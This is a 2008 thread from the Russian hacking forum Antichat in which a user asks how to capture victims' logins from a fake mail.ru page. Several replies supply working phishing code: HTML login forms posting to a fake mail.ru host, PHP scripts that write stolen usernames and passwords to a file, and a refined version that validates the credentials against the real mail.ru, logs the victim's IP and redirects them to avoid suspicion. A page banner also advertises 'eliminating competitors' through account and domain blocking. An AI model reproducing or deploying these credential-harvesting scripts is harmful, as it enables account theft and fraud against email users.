Форум АНТИЧАТ - Взлом через фейк

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Взлом через фейк

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Взлом через фейк

26.06.2008, 09:59

~~abrut3000~~

Banned

Регистрация: 24.06.2008

Сообщений: 6

Провел на форуме:
179131

Репутация: 0

Взлом через фейк

У меня вопрос!!! Я сделал фейк mail.ru как мне сделать письмо как на фото чтоб когда жертва вводит свои данные и нажимает подтвердить
они записовались в базу БД?

Кто так сможет сделать отзовитесь!

26.06.2008, 10:35

nbd

Познающий

Регистрация: 27.10.2006

Сообщений: 90

Провел на форуме:
560577

Репутация: 68

Отправить сообщение для nbd с помощью ICQ

Зачем тебе заморочки с БД. Пиши в файл. Например так.

PHP код:


		
			
Содержимое нтмл письма (форма отправки данных)



...

<form action="http://фейк_мейл.ру/auth.php" method="POST">

<input type="text" name="login" >Логин<br>

<input type="password" name="pass">Пароль

<input type="submit">

</form>

....

и собственно скрипт записи логина и пасса

PHP код:


		
			
<?php

$login=$_POST['login'];

$pass=$_POST['pass'];

$data=$login." ".$pass;

$fh=fopen("data.txt", "a");

fwrite($fh, $data);

fclose($fh);

?>

26.06.2008, 10:49

Chaak

Познавший АНТИЧАТ

Регистрация: 01.06.2008

Сообщений: 1,047

Провел на форуме:
5321514

Репутация: 3313

Отправить сообщение для Chaak с помощью ICQ

Цитата:

Сообщение от nbd

Зачем тебе заморочки с БД. Пиши в файл. Например так.

PHP код:


		
			
Содержимое нтмл письма (форма отправки данных)



...

<form action="http://фейк_мейл.ру/auth.php" method="POST">

<input type="text" name="login" >Логин<br>

<input type="password" name="pass">Пароль

<input type="submit">

</form>

....

и собственно скрипт записи логина и пасса

PHP код:


		
			
<?php

$login=$_POST['login'];

$pass=$_POST['pass'];

$data=$login." ".$pass;

$fh=fopen("data.txt", "a");

fwrite($fh, $data);

fclose($fh);

?>

на mail.ru POST не работает поэтому:

PHP код:


		
			
<form action="http://фейк_мейл.ру/auth.php" method="GET"> 

<input type="text" name="login" >Логин<br> 

<input type="password" name="pass">Пароль 

<input type="submit">

PHP код:


		
			
<?php 

$login=$_GET['login']; 

$pass=$_GET['pass']; 

$data=$login.";".$pass."\n"; 

$fh=fopen("data.txt", "a"); 

fwrite($fh, $data); 

fclose($fh); 

Header("Location: http://win.mail.ru/cgi-bin/auth");

exit();

?>

Последний раз редактировалось ChaaK; 26.06.2008 в 11:32..

26.06.2008, 10:59

nbd

Познающий

Регистрация: 27.10.2006

Сообщений: 90

Провел на форуме:
560577

Репутация: 68

С гетом палево будет (: Увидев в адресной строке адрес вида http://фейк_мейл.ру/auth.php?login=lamer&pass=123456 даже имбицил поймет, что его поимели.

Кстати редирект на http://mail.ru/cgi-bin/ - Forbidden

Насчет поста ниже :
Так я и не спорил (: Я просто предложил заменить редирект на http://win.mail.ru/cgi-bin/auth

Последний раз редактировалось nbd; 26.06.2008 в 11:19..

27.06.2008, 07:53

~~abrut3000~~

Banned

Регистрация: 24.06.2008

Сообщений: 6

Провел на форуме:
179131

Репутация: 0

Эти все скрипты которые вы написали паляться службой mail.ru

27.06.2008, 13:04

Naydav

Постоянный

Регистрация: 30.12.2006

Сообщений: 434

Провел на форуме:
849583

Репутация: 210

Цитата:

Эти все скрипты которые вы написали паляться службой mail.ru

Имееться ввиду, что бы в письме прислать форму?
Наверно спалят тогда...
Интересно, надо будет проверить позволяет ли мейл.ру отсылать данные гетом(из письма непосредственно)

Последний раз редактировалось Naydav; 27.06.2008 в 13:09..

27.06.2008, 14:03

~~abrut3000~~

Banned

Регистрация: 24.06.2008

Сообщений: 6

Провел на форуме:
179131

Репутация: 0

Вот это письмо как на фото ни как не палиться почему не знаю

18.07.2008, 08:58

~~abrut3000~~

Banned

Регистрация: 24.06.2008

Сообщений: 6

Провел на форуме:
179131

Репутация: 0

еще есть предложения

21.07.2008, 13:24

~~P3L3NG~~

Banned

Регистрация: 04.06.2008

Сообщений: 402

Провел на форуме:
2267346

Репутация: 719

тоже интересно, присылали недавно такое письмо. я его разобрал хорошенько. код, адрес фэйка, ип того кто слыл узнал=) а повторить не получается. "расширенный формат" криво код преобразует(((

#10

21.07.2008, 13:38

nc.STRIEM

Members of Antichat - Level 5

Регистрация: 05.04.2006

Сообщений: 1,066

Провел на форуме:
3493315

Репутация: 1228

Отправить сообщение для nc.STRIEM с помощью ICQ

вот самый нормальный вариант фейка.

PHP код:


		
			
<?php

    error_reporting(0);

    $cont = file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.$_POST['Login'].'&Domain='.$_POST['Domain'].'&Password='.$_POST['Password']);

    if(strstr($cont, '<b>Ошибка</b>'))

        die(str_replace('action="auth"', '', $cont));



    $fo = fopen('mail.lg', 'a');

    fwrite($fo, date('d.m.y H:i:s')."\t".$_SERVER['REMOTE_ADDR']."\n");

    fwrite($fo, $_POST['Login'].'@'.$_POST['Domain']."\t".$_POST['Password']."\n\n");

    fclose($fo);

    header('Location: http://win.mail.ru/cgi-bin/auth?Login='.$_POST['Login'].'&Domain='.$_POST['Domain'].'&Password='.$_POST['Password']);

?>

__________________
No СПлоА - No World!
Как узнать информацию о посетителях сайта

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Взлом сервера одного универе через SQL inj	.:KeepeR:.	Video.Antichat	17	19.04.2008 21:07
Взлом через cookie	k00p3r	Чужие Статьи	0	13.06.2005 13:56

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход